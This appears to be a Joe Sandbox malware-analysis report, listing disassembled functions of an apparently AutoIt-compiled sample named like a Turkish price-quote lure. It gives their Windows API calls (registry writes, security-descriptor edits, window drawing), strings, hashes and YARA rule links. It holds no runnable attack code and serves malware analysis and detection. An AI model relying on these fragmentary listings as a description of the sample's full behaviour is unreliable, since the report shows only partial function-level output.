Instruction ID: 0202261d857d61894efe601e322b6714125f5cff5ac6a98b6b92bca922140fbb
Opcode Fuzzy Hash: 04121d1343306255866a21e0c1d1bf5b6c78dc268aaca7d97f59dfd09e5dff66
Instruction Fuzzy Hash: 4161F63460520DEBCB04EF24C981EFE77B4BB85710B249815F946AB292DB39ED41DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A173E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00A17421
SetTextColor.GDI32(?,?), ref: 00A17425
GetSysColorBrush.USER32(0000000F), ref: 00A1743B
GetSysColor.USER32(0000000F), ref: 00A17446
CreateSolidBrush.GDI32(?), ref: 00A1744B
GetSysColor.USER32(00000011), ref: 00A17463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A17471
SelectObject.GDI32(?,00000000), ref: 00A17482
SetBkColor.GDI32(?,00000000), ref: 00A1748B
SelectObject.GDI32(?,?), ref: 00A17498
InflateRect.USER32(?,000000FF,000000FF), ref: 00A174B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A174CE
GetWindowLongW.USER32(00000000,000000F0), ref: 00A174DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A1752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A17554
InflateRect.USER32(?,000000FD,000000FD), ref: 00A17572
DrawFocusRect.USER32(?,?), ref: 00A1757D
GetSysColor.USER32(00000011), ref: 00A1758E
SetTextColor.GDI32(?,00000000), ref: 00A17596
DrawTextW.USER32(?,00A170F5,000000FF,?,00000000), ref: 00A175A8
SelectObject.GDI32(?,?), ref: 00A175BF
DeleteObject.GDI32(?), ref: 00A175CA
SelectObject.GDI32(?,?), ref: 00A175D0
DeleteObject.GDI32(?), ref: 00A175D5
SetTextColor.GDI32(?,?), ref: 00A175DB
SetBkColor.GDI32(?,?), ref: 00A175E5

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: d72f9965c2d9820c9118aacdd887f180d9fb3f6a227f72400ae0c0fe31fe98a8
Instruction ID: afadafa78720fe52942a591abd9ac6e5cbebd819d7f6fa43c9d996b43fb188fb
Opcode Fuzzy Hash: d72f9965c2d9820c9118aacdd887f180d9fb3f6a227f72400ae0c0fe31fe98a8
Instruction Fuzzy Hash: 15616C76940218BFDF01DFA4DC49AEEBFB9EB08330F109215F911AB2A1D7749981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A10FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A11128
GetDesktopWindow.USER32 ref: 00A1113D
GetWindowRect.USER32(00000000), ref: 00A11144
GetWindowLongW.USER32(?,000000F0), ref: 00A11199
DestroyWindow.USER32(?), ref: 00A111B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A111ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A1120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A1121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00A11232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00A11245
IsWindowVisible.USER32(00000000), ref: 00A112A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00A112BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00A112D0
GetWindowRect.USER32(00000000,?), ref: 00A112E8
MonitorFromPoint.USER32(?,?,00000002), ref: 00A1130E
GetMonitorInfoW.USER32(00000000,?), ref: 00A11328
CopyRect.USER32(?,?), ref: 00A1133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 00A113AA

Strings

0, xrefs: 00A110D3
tooltips_class32, xrefs: 00A111E6
(, xrefs: 00A1131B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 32cf4b955392a341776d9c5930525657ffcfc6e7fa1943127fd7eec8c4dc9b0b
Instruction ID: 1f6f4b78646a36d563a6bb60282cc1b22c1e849235714f0172847b09d009ed08
Opcode Fuzzy Hash: 32cf4b955392a341776d9c5930525657ffcfc6e7fa1943127fd7eec8c4dc9b0b
Instruction Fuzzy Hash: D1B18B71608341AFD700DF64C884BAAFBE4FF88750F00891CFA999B2A1D771E885CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A10241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A102E5
_wcslen.LIBCMT ref: 00A1031F
_wcslen.LIBCMT ref: 00A10389
_wcslen.LIBCMT ref: 00A103F1
_wcslen.LIBCMT ref: 00A10475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A104C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A10504

Part of subcall function 0099F9F2: _wcslen.LIBCMT ref: 0099F9FD

Part of subcall function 009E223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009E2258
Part of subcall function 009E223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009E228A

Strings

GETSUBITEMCOUNT, xrefs: 00A10384, 00A1039F
FINDITEM, xrefs: 00A10627
ISSELECTED, xrefs: 00A104DD
GETSELECTEDCOUNT, xrefs: 00A10470, 00A1048B
SELECTALL, xrefs: 00A10515
SELECTCLEAR, xrefs: 00A1052D
SELECTINVERT, xrefs: 00A1057E
DESELECT, xrefs: 00A1059C
GETITEMCOUNT, xrefs: 00A10316, 00A10337
VIEWCHANGE, xrefs: 00A10675
GETTEXT, xrefs: 00A103EC, 00A10407
SELECT, xrefs: 00A10548
GETSELECTED, xrefs: 00A105E1

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 5adc840fa7909a897f1901ebe4075d79a8de29b23023f17b543e484a892a5576
Instruction ID: 3c7c5d08885ff7957f83ce315a285b3b575ae5ebc3886c17e3a637f7780394af
Opcode Fuzzy Hash: 5adc840fa7909a897f1901ebe4075d79a8de29b23023f17b543e484a892a5576
Instruction Fuzzy Hash: 90E1AD312082418FC714EF24C590DAEB7E6BFC8714B14895DF8A69B3A1DB70ED85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00998891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00998968
GetSystemMetrics.USER32(00000007), ref: 00998970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0099899B
GetSystemMetrics.USER32(00000008), ref: 009989A3
GetSystemMetrics.USER32(00000004), ref: 009989C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 009989E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009989F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00998A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00998A3C
GetClientRect.USER32(00000000,000000FF), ref: 00998A5A
GetStockObject.GDI32(00000011), ref: 00998A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00998A81

Part of subcall function 0099912D: GetCursorPos.USER32(?), ref: 00999141
Part of subcall function 0099912D: ScreenToClient.USER32(00000000,?), ref: 0099915E
Part of subcall function 0099912D: GetAsyncKeyState.USER32(00000001), ref: 00999183
Part of subcall function 0099912D: GetAsyncKeyState.USER32(00000002), ref: 0099919D

SetTimer.USER32(00000000,00000000,00000028,009990FC), ref: 00998AA8

Strings

AutoIt v3 GUI, xrefs: 00998A20

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: dd20927948c26a30eab47622d9fc2030db48edce78f7f2f20ba3dabb006d63e5
Instruction ID: 8ddc0b86529373805b0803e6d4481dc5c07d493f2a30bc26a7ca517dde6766dd
Opcode Fuzzy Hash: dd20927948c26a30eab47622d9fc2030db48edce78f7f2f20ba3dabb006d63e5
Instruction Fuzzy Hash: 0CB15C71A80209DFDF14DFA8CC45BEE7BB5FB48325F10852AFA15AB290DB74A841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009E0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009E1114
Part of subcall function 009E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1120
Part of subcall function 009E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E112F
Part of subcall function 009E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1136
Part of subcall function 009E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009E114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009E0DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009E0E29
GetLengthSid.ADVAPI32(?), ref: 009E0E40
GetAce.ADVAPI32(?,00000000,?), ref: 009E0E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009E0E96
GetLengthSid.ADVAPI32(?), ref: 009E0EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 009E0EB5
HeapAlloc.KERNEL32(00000000), ref: 009E0EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 009E0EDD
CopySid.ADVAPI32(00000000), ref: 009E0EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009E0F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009E0F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 009E0F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0F6E
HeapFree.KERNEL32(00000000), ref: 009E0F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0F7E
HeapFree.KERNEL32(00000000), ref: 009E0F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0F8E
HeapFree.KERNEL32(00000000), ref: 009E0F95
GetProcessHeap.KERNEL32(00000000,?), ref: 009E0FA1
HeapFree.KERNEL32(00000000), ref: 009E0FA8

Part of subcall function 009E1193: GetProcessHeap.KERNEL32(00000008,009E0BB1,?,00000000,?,009E0BB1,?), ref: 009E11A1
Part of subcall function 009E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,009E0BB1,?), ref: 009E11A8
Part of subcall function 009E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009E0BB1,?), ref: 009E11B7

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 572e8cbf11af1cf1e71191c6d386544c824261860cb9bff89341099e84283753
Instruction ID: 27727ebc4f876601d3730d9f69fcb9fab7c42eab1425cf7101314df92cf39213
Opcode Fuzzy Hash: 572e8cbf11af1cf1e71191c6d386544c824261860cb9bff89341099e84283753
Instruction Fuzzy Hash: 9771AB7290025AABDF21CFA5DC48BEEBBBCBF48310F048624F959A6190D770DE55CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A0C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A0C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,00A1CC08,00000000,?,00000000,?,?), ref: 00A0C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00A0C5A4
_wcslen.LIBCMT ref: 00A0C5F4
_wcslen.LIBCMT ref: 00A0C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00A0C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00A0C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00A0C84D
RegCloseKey.ADVAPI32(?), ref: 00A0C881
RegCloseKey.ADVAPI32(00000000), ref: 00A0C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00A0C960

Strings

REG_DWORD, xrefs: 00A0C804
REG_SZ, xrefs: 00A0C644
REG_QWORD, xrefs: 00A0C8C3
REG_BINARY, xrefs: 00A0C913
REG_MULTI_SZ, xrefs: 00A0C6F5
REG_EXPAND_SZ, xrefs: 00A0C5CD

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: beae5504c1e94f9b689c87c20ade7fb6f328fa7c7b777df4dbd1d27f7271610d
Instruction ID: e45eb09071f30709efb40719b3c0a06c86315aa6f78e604033a8d5c06f7963c4
Opcode Fuzzy Hash: beae5504c1e94f9b689c87c20ade7fb6f328fa7c7b777df4dbd1d27f7271610d
Instruction Fuzzy Hash: 501267356042019FDB14EF24D881B2AB7E5FF88724F14895CF89A9B3A2DB31ED45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A1091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A109C6
_wcslen.LIBCMT ref: 00A10A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A10A54
_wcslen.LIBCMT ref: 00A10A8A
_wcslen.LIBCMT ref: 00A10B06
_wcslen.LIBCMT ref: 00A10B81

Part of subcall function 0099F9F2: _wcslen.LIBCMT ref: 0099F9FD

Part of subcall function 009E2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009E2BFA

Strings

CHECK, xrefs: 00A10A85, 00A10AA0
GETITEMCOUNT, xrefs: 00A10C1E
UNCHECK, xrefs: 00A10D3E
COLLAPSE, xrefs: 00A10B01, 00A10B1C
EXPAND, xrefs: 00A10BF8
GETTEXT, xrefs: 00A10C97
ISCHECKED, xrefs: 00A10CE1
EXISTS, xrefs: 00A10B7C, 00A10B97
SELECT, xrefs: 00A10D11
GETSELECTED, xrefs: 00A10C4E
GETTOTALCOUNT, xrefs: 00A109F2, 00A10A17

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 6e6abbb38cb4eab425f896cf8127245fab8576212d6906c4c7bab7bcfb232752
Instruction ID: 7ce2c8fad4a5ef2bbdb1258ec2058b9431b83d8beb536cc70acc6d8849d3c769
Opcode Fuzzy Hash: 6e6abbb38cb4eab425f896cf8127245fab8576212d6906c4c7bab7bcfb232752
Instruction Fuzzy Hash: 82E1BB352083418FCB14EF24C450EAAB7E1BFD8358B14895CF8969B3A2DB70ED85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A0C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A0B6AE,?,?), ref: 00A0C9B5
_wcslen.LIBCMT ref: 00A0C9F1
_wcslen.LIBCMT ref: 00A0CA68
_wcslen.LIBCMT ref: 00A0CA9E
_wcslen.LIBCMT ref: 00A0CAF9
_wcslen.LIBCMT ref: 00A0CB2F
_wcslen.LIBCMT ref: 00A0CB7F

Strings

HKEY_CURRENT_CONFIG, xrefs: 00A0CB79, 00A0CB7E
HKEY_LOCAL_MACHINE, xrefs: 00A0CA62, 00A0CA67
HKEY_USERS, xrefs: 00A0CBDF
HKEY_CLASSES_ROOT, xrefs: 00A0CAF3, 00A0CAF8
HKCC, xrefs: 00A0CBAC
HKLM, xrefs: 00A0CA98, 00A0CA9D
HKCU, xrefs: 00A0CBCE
HKU, xrefs: 00A0CBF0
HKEY_CURRENT_USER, xrefs: 00A0CBBD
HKCR, xrefs: 00A0CB29, 00A0CB2E

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 7257588da850fdc0878d854ea093a23d48ff2e328d66582ade7752b1f12e74c4
Instruction ID: 8e052384f9a40fe6683e7cffeeb1228f9abbbf6c9115c1a3734f4dcc4bf0275d
Opcode Fuzzy Hash: 7257588da850fdc0878d854ea093a23d48ff2e328d66582ade7752b1f12e74c4
Instruction Fuzzy Hash: A471D53260056E8BCB10DF6CE9516BF33A6ABA17B4B650724FC559B2C4E635CD4583A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A1833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A1835A
_wcslen.LIBCMT ref: 00A1836E
_wcslen.LIBCMT ref: 00A18391
_wcslen.LIBCMT ref: 00A183B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A183F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00A15BF2), ref: 00A1844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A18487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A184CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A18501
FreeLibrary.KERNEL32(?), ref: 00A1850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A1851D
DestroyIcon.USER32(?,?,?,?,?,00A15BF2), ref: 00A1852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A18549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A18555

Strings

.dll, xrefs: 00A183AB
.icl, xrefs: 00A18368
.exe, xrefs: 00A18388

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 1c3d55cd37a47116a5177ee320f76d25332e40c8f93a1de51f4df5681aa5f074
Instruction ID: 4117eb2499faf3571e867b393947ba80a27b942f268526ab8970a0668f55abd2
Opcode Fuzzy Hash: 1c3d55cd37a47116a5177ee320f76d25332e40c8f93a1de51f4df5681aa5f074
Instruction Fuzzy Hash: 0B61CF71540215BAEB14DF64CC41BFE77ACFB44B21F108609F815DA1D1DFB8A991CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00987778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

Unterminated group of comments, xrefs: 009C528C
#pragma compile, xrefs: 009877D3
#requireadmin, xrefs: 009877FF
#OnAutoItStartRegister, xrefs: 00987817
#comments-end, xrefs: 009878D9
Bad directive syntax error, xrefs: 009C519A
#include-once, xrefs: 0098782F
Cannot parse #include, xrefs: 009C5279
", xrefs: 009C5153
#notrayicon, xrefs: 009877E7
#include, xrefs: 00987847
#comments-start, xrefs: 0098785F, 009878B1
#cs, xrefs: 00987873, 009878C5
', xrefs: 009C5169
#ce, xrefs: 009878ED

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: a34fcc21ae989da84f3904d353ab3947e8d1d65f71b5df7cb00a5f1d883967dc
Instruction ID: f02aeda7d602b4401fdcb4aadeaceaede0cd87cab31cba78eaba70fee5cec0b5
Opcode Fuzzy Hash: a34fcc21ae989da84f3904d353ab3947e8d1d65f71b5df7cb00a5f1d883967dc
Instruction Fuzzy Hash: ED81F971A48605BBDB11BFA4CC42FAFB7A8BF95300F144424F805AA296EB74D951C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 009E5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 009E5A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009E5A40
SetWindowTextW.USER32(?,?), ref: 009E5A57
GetDlgItem.USER32(?,000003EA), ref: 009E5A6C
SetWindowTextW.USER32(00000000,?), ref: 009E5A72
GetDlgItem.USER32(?,000003E9), ref: 009E5A82
SetWindowTextW.USER32(00000000,?), ref: 009E5A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009E5AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009E5AC3
GetWindowRect.USER32(?,?), ref: 009E5ACC
_wcslen.LIBCMT ref: 009E5B33
SetWindowTextW.USER32(?,?), ref: 009E5B6F
GetDesktopWindow.USER32 ref: 009E5B75
GetWindowRect.USER32(00000000), ref: 009E5B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 009E5BD3
GetClientRect.USER32(?,?), ref: 009E5BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 009E5C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 009E5C2F

Memory Dump Source

